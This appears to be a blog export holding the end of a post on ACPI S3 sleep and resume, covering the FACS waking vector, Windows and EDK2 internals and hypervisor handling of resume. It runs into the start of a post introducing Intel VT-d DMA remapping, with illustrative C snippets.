</div></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9SCUkQCkDndYKoxTK2joWBiY_YyG_2ed8KNk04KncAgP9bJvztrMQ999L3YvvBfj0qG_g_aYmIRr0ouY9Hku8ZaYjUK2uFxQTcvvwLamVUzWxjBPutaEbtI-MiLW-5IFfIrBTv_jPv_4/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="404" data-original-width="2189" height="59" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9SCUkQCkDndYKoxTK2joWBiY_YyG_2ed8KNk04KncAgP9bJvztrMQ999L3YvvBfj0qG_g_aYmIRr0ouY9Hku8ZaYjUK2uFxQTcvvwLamVUzWxjBPutaEbtI-MiLW-5IFfIrBTv_jPv_4/" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;">...</div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj5Cg3NaA1AoM9WYneM0Hxl4SlgsgWvwKFw1EBc0C5vSyaZ-mBXCWdOOWxrXdyY18VUMo0TBVv6jTkeXdgzBa3tXms7u8iXQvL_Jopd8Y4bkVZR37ZhB5S2z9r-h7oZcotS3QIjAWrv4M/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="467" data-original-width="2218" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj5Cg3NaA1AoM9WYneM0Hxl4SlgsgWvwKFw1EBc0C5vSyaZ-mBXCWdOOWxrXdyY18VUMo0TBVv6jTkeXdgzBa3tXms7u8iXQvL_Jopd8Y4bkVZR37ZhB5S2z9r-h7oZcotS3QIjAWrv4M/" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;">...</div><div class="separator" style="clear: both; text-align: center;"><div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-6g92ggWEyEyodIyo-H0ikOJQO9d0JkRCt8OOv7AirGDKIHBL6GiJMY-14mB5BIQCs37Hegqom5HAJCnnfp0WcpJ8ClfUUvkkndspDzgPRL2fk8xNA252eaxff-iXh6HdRh_2ILB6pqs/"><img alt="" data-original-height="408" data-original-width="2184" height="60" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-6g92ggWEyEyodIyo-H0ikOJQO9d0JkRCt8OOv7AirGDKIHBL6GiJMY-14mB5BIQCs37Hegqom5HAJCnnfp0WcpJ8ClfUUvkkndspDzgPRL2fk8xNA252eaxff-iXh6HdRh_2ILB6pqs/" width="320" /></a></div></div></div><div>Depending on the implementation of ACPI, some fields may be unused. On my system, the SLEEP_CONTROL_REG field in the table tells that the register is located at IO-port 0x1804. </div></div><div><br /></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj9ve454sxg5y8ugSaSAznUSCG7KjxMjRlqqwRVaWiYniNZ4iAiETl8SYrbSqaxbOsVbM1z1h7jUvhUXlULNosvuonxoOGCDMajSf6dB3EdSr_nlKQlfX1pjv1JPF126sDLsft_Z1IH7k/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="1174" data-original-width="1920" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj9ve454sxg5y8ugSaSAznUSCG7KjxMjRlqqwRVaWiYniNZ4iAiETl8SYrbSqaxbOsVbM1z1h7jUvhUXlULNosvuonxoOGCDMajSf6dB3EdSr_nlKQlfX1pjv1JPF126sDLsft_Z1IH7k/w458-h280/image.png" width="458" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">RWEverything parsing the FACP table on Windows<br /></td></tr></tbody></table><br /></div><div>So far, we learned that: </div><div><ul style="text-align: left;"><li>the system enters S3 state when software sets SLP_EN and SLP_TYP bits in the PM1 control register.</li><li>the PM1 control register can be located through the FADT ACPI table. 
</li></ul></div><div>Note that the ACPI table itself can be easily located with platform specific ways, such as /sys/firmware/acpi on Linux, GetSystemFirmwareTable() on Windows, or EfiLocateFirstAcpiTable() on UEFI.</div><div><br /></div><h3 style="text-align: left;">Resuming from S3</h3><div><div>On system start-up, system firmware executes the same initialization path as the normal boot path, and then, diverges when it detects that the previous shutdown was entering S3. This resume-specific path is called the S3 resume boot path and well explained in the UEFI Platform Initialization (PI) specification. </div><div><br /></div><div>In a nutshell, the S3 resume boot path executes the boot scripts to re-initialize the platform, instead of executing the last three boot phases: DXE, BDS and TSL. The boot scripts are saved in non-volatile storage and replicate platform configuration made during normal boot. The below illustration from the spec highlights differences between normal and S3 resume boot paths, as well as how boot scripts are saved and consumed.</div></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglCXNh1yOcfRud0f6TmTeampzkgJK1WGemw_IwEl2_Rwar3_KJE33IaQ2vGaEJQXcwb66UYM3kdPxluT4CULbBaod4rCjoYERY_jeEjbNmDqdBnql0P5PxsRMAITItbcZjc2Oiww5WH0I/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="941" data-original-width="1809" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglCXNh1yOcfRud0f6TmTeampzkgJK1WGemw_IwEl2_Rwar3_KJE33IaQ2vGaEJQXcwb66UYM3kdPxluT4CULbBaod4rCjoYERY_jeEjbNmDqdBnql0P5PxsRMAITItbcZjc2Oiww5WH0I/w543-h282/image.png" width="543" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Normal and S3 resume boot paths, from the PI spec<br /></td></tr></tbody></table>As 
illustrated, after boot scripts are executed, an OS waking vector is executed to resume execution of the OS on the S3 resume boot path. The OS waking vector is the very first OS-specific code to run (code that is developed by the OS vendor, and not part of system firmware). This is typically 16-bit real-mode code that switches the processor to long mode, restores registers to the values they had before the system entered S3, and lets the OS execute further restoration code to fully resume the system. The OS sets up this OS waking vector right before entering S3. </div><div><br /></div><div>How does the OS set up the OS waking vector, and how does system firmware find its location? Again, ACPI defines the way. </div><div><br /></div><div>The Firmware ACPI Control Structure (FACS) table defines a field called Firmware Waking Vector. The OS writes the address of the OS waking vector to this field, and system firmware reads it to locate and execute the OS waking vector. 
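<div><br /></div><div>To make the handshake concrete, here is a minimal sketch of the FACS layout and the two accesses involved. The field order and sizes follow the FACS definition in the ACPI specification; the type name <code>facs_t</code> and both helper functions are hypothetical names used only for illustration, and are not taken from Windows or EDK2.</div>

```c
#include <stddef.h>
#include <stdint.h>

/* FACS layout as defined in the ACPI specification (64 bytes in total). */
#pragma pack(push, 1)
typedef struct {
    char     signature[4];              /* "FACS" */
    uint32_t length;
    uint32_t hardware_signature;
    uint32_t firmware_waking_vector;    /* 32-bit physical address, offset 12 */
    uint32_t global_lock;
    uint32_t flags;
    uint64_t x_firmware_waking_vector;  /* 64-bit counterpart of the field above */
    uint8_t  version;
    uint8_t  reserved0[3];
    uint32_t ospm_flags;
    uint8_t  reserved1[24];
} facs_t;
#pragma pack(pop)

_Static_assert(offsetof(facs_t, firmware_waking_vector) == 12, "unexpected offset");
_Static_assert(sizeof(facs_t) == 64, "unexpected FACS size");

/* OS side (hypothetical helper): publish the waking vector before entering S3. */
static void facs_set_waking_vector(volatile facs_t *facs, uint32_t physical_address)
{
    facs->firmware_waking_vector = physical_address;
}

/* Firmware side (hypothetical helper): read the address to jump to on resume. */
static uint32_t facs_get_waking_vector(const volatile facs_t *facs)
{
    return facs->firmware_waking_vector;
}
```

<div>The sketch only models the 32-bit field discussed here. Real code would operate on the FACS mapped from the physical address given by the FADT, not on a local copy.</div>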
</div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1ZJdeMIDg6sG0hJ3rVUTOHOGClL8-fD5gcSxOO1GG4QO_VvbFwsBAY5-PcmeK_ABasSsjIivVN7hHHVizqGzsiCcE_gN5Xlhe4NakFzBMSOLbX4ZiZRVLCQ7Cyi6ZD4VbmG9rVgUI_w8/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="405" data-original-width="2267" height="57" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1ZJdeMIDg6sG0hJ3rVUTOHOGClL8-fD5gcSxOO1GG4QO_VvbFwsBAY5-PcmeK_ABasSsjIivVN7hHHVizqGzsiCcE_gN5Xlhe4NakFzBMSOLbX4ZiZRVLCQ7Cyi6ZD4VbmG9rVgUI_w8/" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Firmware Waking Vector in FACS, from the ACPI spec<br /></td></tr></tbody></table><br />To summarize the flow in chronological order:</div><div><ol style="text-align: left;"><li>The OS writes the address of the OS waking vector (i.e., bootstrap code) to the Firmware Waking Vector field of the FACS table before entering S3.</li><li>System firmware reads the field to learn the address of the OS waking vector and transfers execution to that address during the S3 resume boot path.</li><li>The OS waking vector eventually restores system states using configurations kept in memory.</li></ol><div><br /></div></div><h2 style="text-align: left;">Implementation on Windows and EDK2</h2><div>Let us look into how what we reviewed above is implemented on Windows (build 18362) and EDK2. </div><div>EDK2 is a reference implementation of UEFI, the system firmware specification, and is very commonly used as a base for commercial system firmware. </div><div><br /></div><h3 style="text-align: left;">Entering S3</h3><div>On Windows, HaliAcpiSleep() is the main function that implements S3 handling and is called on all processors when a user requests entering S3. 
It roughly does the following, in order. </div><div><ol style="text-align: left;"><li>The bootstrap processor (BSP) sets up the OS waking vector with HalpSetupRealModeResume().<br /><div style="background-color: #1e1e1e; font-family: Consolas, "Courier New", monospace; font-size: 11px; line-height: 15px; white-space: pre;"><span style="color: #d4d4d4;">*HalpWakeVector = HalpLowStubPhysicalAddress;
</span><span style="color: #6aa84f;">//
// Where HalpWakeVector is the address of the
// Firmware Waking Vector field in the FACS table,
// initialized at HaliInitPowerManagement()
//</span></div></li><li>BSP waits for all APs to complete saving their states.<br /><div style="background-color: #1e1e1e; color: #d4d4d4; font-family: Consolas, "Courier New", monospace; font-size: 11px; line-height: 15px; white-space: pre;"><div>InterlockedAdd(&HalpFlushBarrier, 1);</div><div>while (HalpFlushBarrier != ProcessorCount);</div></div></li><li>Application processors (APs) save their registers with HalpSaveProcessorState().</li><li>APs enter the loop that does not exit in a successful path in HalpFlushAndWait().<br /><div style="background-color: #1e1e1e; color: #d4d4d4; font-family: Consolas, "Courier New", monospace; font-size: 11px; line-height: 15px; white-space: pre;"><div>InterlockedIncrement(&HalpFlushBarrier);</div><div>while (HalpFlushBarrier);</div></div></li><li>BSP writes to the PM1 control register(s) to set the following values with HalpAcpiPmRegisterWrite().</li><ul><li>SLP_TYP = 5 (S3)</li><li>SLP_EN = 1 </li></ul></ol><div>This puts the system into the S3 state. Let us look into the resume path.</div><div><br /></div><h3 style="text-align: left;">Resuming from S3</h3><div><ol style="text-align: left;"><li>On the EDK2, system firmware, side, the S3 resume boot specific execution flow looks roughly like this.<br /><div style="background-color: #1e1e1e; color: #d4d4d4; font-family: Consolas, "Courier New", monospace; font-size: 11px; line-height: 15px; white-space: pre;"><div>...</div><div> -> DxeLoadCore()</div><div> -> S3RestoreConfig2()</div><div> -> S3ResumeExecuteBootScript()</div><div> -> S3BootScriptExecutorEntryFunction()</div></div></li><li><div>S3BootScriptExecutorEntryFunction() executes the boot script and jumps to the OS waking vector as indicated by <span style="background-color: #1e1e1e; color: #d4d4d4; font-family: Consolas, "Courier New", monospace; font-size: 11px; white-space: pre;">Facs->FirmwareWakingVector</span> at the end.</div></li><li><div>The OS waking vector is a copy of HalpRMStub. 
This eventually brings the execution of BSP to the right after HalpSetupRealModeResume() with RAX=1, as if it returned from the function. </div></li><li>BSP wakes up other APs by sending INIT-SIPI-SIPI.<div style="background-color: #1e1e1e; font-family: Consolas, "Courier New", monospace; font-size: 11px; line-height: 15px; white-space: pre;"><div><span style="color: #6aa84f;">//
// This wakes up all APs with HalStartNextProcessor() calls
//</span></div><div><span style="color: #d4d4d4;">HalpAcpiPostSleep(...); </span><span style="color: #6aa84f;"> </span></div></div></li><li><div>The INIT-SIPI-SIPI brings the APs to the point right after HalpSaveProcessorState() with RAX=1, as if they returned from the function. For more details on how INIT-SIPI-SIPI starts up APs, please read <a href="https://standa-note.blogspot.com/2020/03/initializing-application-processors-on.html" target="_blank">the previous post</a>. </div></li><li><div>The BSP and all APs call HalpPostSleepMP() to restore other platform states, then return from HaliAcpiSleep(), continuing OS execution as usual</div></li></ol></div></div><div><div>If you are interested in how exactly the OS waking vector is set up and resumes the system states, I suggest reversing HaliAcpiSleep() on your own. The way it factors code to keep the flow as straightforward as possible is a masterpiece. </div><div><br /></div><div>Note that on VMware, step 1 of the pre-S3 steps and steps 1-3 of the post-S3 steps are skipped. Windows on VMware does not need them because the VMware hypervisor directly restores system states, instead of going through the full S3 resume boot path. </div></div><div><br /></div><h2 style="text-align: left;">Handling S3 with Type-1 Hypervisor</h2><div>As mentioned previously, S3 is a challenge for a type-1 hypervisor that is loaded during the TSL phase because:</div><div><ul style="text-align: left;"><li>On resume, the TSL phase is skipped, so the hypervisor has no opportunity to get called.</li><li>On resume, virtualization is disabled and needs to be enabled.</li><li>It cannot add its own boot script to trigger reinitialization, because the boot script is already locked at the TSL phase. </li></ul><div>One may employ a guest support module that subscribes to the resume event and notifies the hypervisor to trigger reinitialization, but this is neither secure, portable, nor reliable. 
Another quick-and-dirty way is to disable S3 by altering the ACPI table, which has an obvious user experience issue. </div></div><div><br /></div><div>A far better way is to hook the OS waking vector. This works as follows:</div><div><ol style="text-align: left;"><li>The hypervisor intercepts IO access to the PM1 control register(s)</li><li>When the guest attempts to write to the register to enter sleep, the hypervisor </li><ol><li>overwrites contents of the Firmware Waking Vector field with its own waking vector address, and</li><li>writes to the register and lets the system enter S3</li></ol><li>When the system wakes up, the hypervisor's waking vector is executed, and it</li><ol><li>reenables virtualization (with VMXON for example) </li><li>sets up the guest state to emulate execution of the guest's waking vector (i.e., the guest's RIP is set to the guest waking vector)</li><li>launches the guest (with VMLAUNCH for example)</li></ol></ol><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDrIZcOEHhkrAIFelVbnTHPluhDHN5J8cGhbt_ICwp_vesOujaTTxmIiZEybbn26yyxioogGlLpmdAsAklkW1GirN0li5korZ-4zQJYz47ObkjuOHMkXwccS3nI4NGAamK1yj_oqLzUMQ/s2459/Untitled.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1014" data-original-width="2459" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDrIZcOEHhkrAIFelVbnTHPluhDHN5J8cGhbt_ICwp_vesOujaTTxmIiZEybbn26yyxioogGlLpmdAsAklkW1GirN0li5korZ-4zQJYz47ObkjuOHMkXwccS3nI4NGAamK1yj_oqLzUMQ/w521-h215/Untitled.png" width="521" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Hypervisor resuming from S3</td></tr></tbody></table><br /></div><div>This way, the hypervisor can take control over the system before running any OS (guest) specific code. 
Implementations of this can be found in multiple hypervisors such as ACRN Embedded Hypervisor and Bitvisor. </div></div><div><br /></div><div>For completeness, note that a type-1 hypervisor that is part of an OEM firmware image or is a PEI module does not have to do any of this. If the module were part of the OEM image, it would be able to add a boot script to register reinitialization, and if the module were a PEI module, it would be executed even in the S3 resume boot path. </div><div><br /></div><h2 style="text-align: left;">Conclusion</h2><div>Entering and resuming from S3 is complex work that involves the OS, system firmware, and hardware implementation, as well as multiple specifications such as PI and ACPI. However, studying it allows us to familiarize ourselves with the industry standards and intriguing low-level implementation details. </div><div><br /></div><div>As a side note, I recommend learning type-1 hypervisors over OS kernel-based ones. A type-1 hypervisor is not just more flexible; it lets you understand in greater detail how the system works (and arguably is a more common design across production-level hypervisors). Registration for the public hypervisor development class is still suspended, but I am looking into reopening it sometime next year as a remote class. If you are interested, please reach out to tanda.sat@gmail.com for details. </div><div><br /></div><h2 style="text-align: left;">References</h2><div><ul style="text-align: left;"><li>ACPI Specification Version 6.3 Errata A (October 2020)</li><li>UEFI Platform Initialization Specification Version 1.7 (Errata A)</li><ul><li><a href="https://www.uefi.org/specifications">https://www.uefi.org/specifications</a></li></ul><li>Intel® 495 Series Chipset Family On-Package PCH Datasheet Vol. 
2</li><ul><li><a href="https://www.intel.ca/content/www/ca/en/products/docs/chipsets/495-series-chipset-on-package-pch-datasheet-vol-2.html">https://www.intel.ca/content/www/ca/en/products/docs/chipsets/495-series-chipset-on-package-pch-datasheet-vol-2.html</a></li></ul><li>RWEverything</li><ul><li><a href="http://rweverything.com/">http://rweverything.com/</a></li></ul><li>Project ACRN Embedded Hypervisor</li><ul><li><a href="https://github.com/projectacrn/acrn-hypervisor">https://github.com/projectacrn/acrn-hypervisor</a></li><li>Search "host_enter_s3" function</li></ul><li>Bitvisor</li><ul><li><a href="https://github.com/matsu/bitvisor">https://github.com/matsu/bitvisor</a></li><li>Search "acpi_pm1_sleep" function</li></ul><li>EDK2</li><ul><li><a href="https://github.com/tianocore/edk2">https://github.com/tianocore/edk2</a></li></ul><li>A Tour Beyond BIOS Implementing S3 Resume with EDKII</li><ul><li><a href="https://github.com/tianocore-docs/Docs/raw/master/White_Papers/A_Tour_Beyond_BIOS_Implementing_S3_resume_with_EDKII_V2.pdf">https://github.com/tianocore-docs/Docs/raw/master/White_Papers/A_Tour_Beyond_BIOS_Implementing_S3_resume_with_EDKII_V2.pdf</a></li></ul></ul><h4 style="text-align: left;">EDIT</h4></div></div><div><ul style="text-align: left;"><li>Nov 25 - Correct that the boot phase relevant to 3rd party type 1 hypervisor is TSL and not BDS.</li></ul></div>Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com0tag:blogger.com,1999:blog-2937860723034111347.post-21640637651799405832020-05-18T06:10:00.001-07:002021-02-03T21:18:27.574-08:00Introductory Study of IOMMU (VT-d) and Kernel DMA Protection on Intel Processors This post is a write up of the introductory study of Intel VT-d, especially about how DMA remapping may be programmed and how Windows uses it. The hope is that this article helps you gain a basic understanding of it and start looking into more details as you are interested.<br />
<br />
<h2>
Intel VT-d</h2>
Intel VT-d, formally called Intel Virtualization Technology for Directed I/O, consists of the following three features:<br />
<ul>
<li>DMA Remapping</li>
<li>Interrupt Remapping</li>
<li>Interrupt Posting</li>
</ul>
<div>
DMA remapping is the most commonly discussed feature out of those and is the focus of this article.<br />
<br /></div>
<div>
<h2>
DMA Remapping</h2>
</div>
<div>
DMA Remapping is an important feature because it allows software to implement security against Direct Memory Access (DMA) from malicious devices by configuring access permissions for each physical memory page. Ordinary memory page protections can be configured through the paging structures and, when Intel VT-x is used, through the Extended Page Tables (EPT), but those configurations are completely ignored for DMA access. Therefore, another protection mechanism is required to complete the protection of memory. DMA remapping provides it.<br />
<br />
The following illustration from the specification highlights that DMA goes through DMA remapping instead of CPU memory virtualization (ie, EPT). </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK4kNxLhz7M728zgsvOSgSxmDZX35-98WheAq6kbkNzrnciwiFpk9wKB6gqaKW8MD-pMgeKYm5YR8yRMF4VZfQbQwkyFU5Il5pOMHs31je9CZkK5VqTajdKFoNnZvSvacjWrlCBfSbsf8/s1600/Untitled.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1008" data-original-width="1600" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK4kNxLhz7M728zgsvOSgSxmDZX35-98WheAq6kbkNzrnciwiFpk9wKB6gqaKW8MD-pMgeKYm5YR8yRMF4VZfQbQwkyFU5Il5pOMHs31je9CZkK5VqTajdKFoNnZvSvacjWrlCBfSbsf8/s640/Untitled.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<h2>
VT-x Not Required</h2>
</div>
<div>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">Ignore the upper half of the illustration above. It is a common misconception that VT-d (DMA remapping) is tied to VT-x, virtual machines, and such. DMA remapping is usable and useful without VT-x; Windows, for example, can enable a DMA remapping based security feature (called </span><a class="_e75a791d-denali-editor-page-rtfLink" href="https://docs.microsoft.com/en-us/windows/security/information-protection/kernel-dma-protection-for-thunderbolt" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #4a6ee0; margin-bottom: 0pt; margin-top: 0pt;" target="_blank"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">Kernel DMA Protection</span></a><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">) without requiring VT-x based security (VBS: Virtualization Based Security) to be enabled.</span></div>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">The sample project shown in this post below enables DMA remapping independently as well.</span></div>
</div>
<div>
<br /></div>
<div>
<h2>
IOMMU</h2>
</div>
<div>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">DMA remapping is also referred to as IOMMU, as it functions like a Memory Management Unit (MMU) for IO memory access. Not only is the concept similar, but its programming interface is also very similar to that of the MMU, that is, the paging structures and EPT. </span></div>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">At a high level, the major difference is that DMA remapping uses two more tables for translation, on top of the familiar PML5, PML4, PDPT, PD, and PT. Simply put, translation with MMU is</span></div>
<ul>
<li><span style="color: #0e101a;">Hardware register => PML4 => PDPT => ...</span></li>
</ul>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">while that of IOMMU is</span></div>
<ul>
<li><span style="color: #0e101a;">Hardware register => Root table => Context table => PML4 => PDPT => ...</span></li>
</ul>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">The specification refers to the tables referenced from the context table as the second-level page tables. The below diagram illustrates the translation flow.</span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGKRKe5F_xBt2Ztr87Bo2ahYqBD0ZDDOrHlN3cSPk49NWA7NU_sWisijXciYaskHPytG0EaqILIKWrlUKEBs0NtkZjPycc_HmICMrbS2QuCBpdlhUJiAIBmOOvVB6HzNRusV447xkSQQc/s1600/Annotation+2020-05-17+084714.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1102" data-original-width="1600" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGKRKe5F_xBt2Ztr87Bo2ahYqBD0ZDDOrHlN3cSPk49NWA7NU_sWisijXciYaskHPytG0EaqILIKWrlUKEBs0NtkZjPycc_HmICMrbS2QuCBpdlhUJiAIBmOOvVB6HzNRusV447xkSQQc/s640/Annotation+2020-05-17+084714.png" width="640" /></a></div>
<div>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">Notice that,</span></div>
<ul>
<li><span style="color: #0e101a;">The entry of the root table is selected based on the bus number of the device requesting DMA.</span></li>
<li><span style="color: #0e101a;">The entry of the context table is selected based on a combination of device and function numbers of the device.</span></li>
</ul>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">As an example of bus:device:function (referred to as source-id) assignment, my test DMA-capable device is listed as Bus 6 : Device 0 : Function 0 on one system as shown below.</span></div>
</div>
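<div>
As a rough illustration of the two selection rules above, the following sketch splits a 16-bit source-id into its bus, device, and function numbers and derives the root table and context table indexes from it. The type and function names (SOURCE_ID_PARTS, DecodeSourceId, and so on) are made up for this example and are not taken from HelloIommuPkg, and it assumes the layout where both tables have 256 entries.</div>

```c
#include <assert.h>
#include <stdint.h>

// Hypothetical helper type for illustration; not part of HelloIommuPkg.
typedef struct {
    uint8_t Bus;       // bits 15:8 of the source-id
    uint8_t Device;    // bits 7:3
    uint8_t Function;  // bits 2:0
} SOURCE_ID_PARTS;

// Splits a source-id into bus, device, and function numbers.
static SOURCE_ID_PARTS DecodeSourceId(uint16_t SourceId)
{
    SOURCE_ID_PARTS parts;
    parts.Bus = (uint8_t)(SourceId >> 8);
    parts.Device = (uint8_t)((SourceId >> 3) & 0x1F);
    parts.Function = (uint8_t)(SourceId & 0x7);
    return parts;
}

// Packs bus, device, and function numbers back into a source-id.
static uint16_t EncodeSourceId(uint8_t Bus, uint8_t Device, uint8_t Function)
{
    assert(Device < 32 && Function < 8);
    return (uint16_t)((Bus << 8) | (Device << 3) | Function);
}

// The root table entry is selected by the bus number.
static unsigned RootTableIndex(uint16_t SourceId)
{
    return SourceId >> 8;
}

// The context table entry is selected by the device and function numbers.
static unsigned ContextTableIndex(uint16_t SourceId)
{
    return SourceId & 0xFF;
}
```

<div>
For the test device at Bus 6 : Device 0 : Function 0, EncodeSourceId(6, 0, 0) gives 0x0600, so the walk would start at root table entry 6 and then use context table entry 0.</div>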
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji7QSIongv35L1NhWZQY4fR41wlb1nhuhyphenhyphenY1MNggGPD5N4zzZzpilZ5h5z6khtlUJnZTxI3wP3whRv9SvEKkvM0EPSnyyILkzddoTfmxx6pdcBX6xKQ1h1cl140kB1MsKSSwejdlIMWu4/s1600/Annotation+2020-05-17+162803.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="1270" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji7QSIongv35L1NhWZQY4fR41wlb1nhuhyphenhyphenY1MNggGPD5N4zzZzpilZ5h5z6khtlUJnZTxI3wP3whRv9SvEKkvM0EPSnyyILkzddoTfmxx6pdcBX6xKQ1h1cl140kB1MsKSSwejdlIMWu4/s640/Annotation+2020-05-17+162803.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
</div>
<div>
<h2>
Sample Code and Demo</h2>
</div>
<div>
Let us jump into some code. <a href="https://github.com/tandasat/HelloIommuPkg">HelloIommuPkg</a> is a runtime DXE driver that enables DMA remapping and protects its first page (PE header) from DMA read and write by any device. </div>
<div>
<br /></div>
<div>
Loading this will yield the following output and protect the page if successful.</div>
<div class="separator" style="clear: both; text-align: center;">
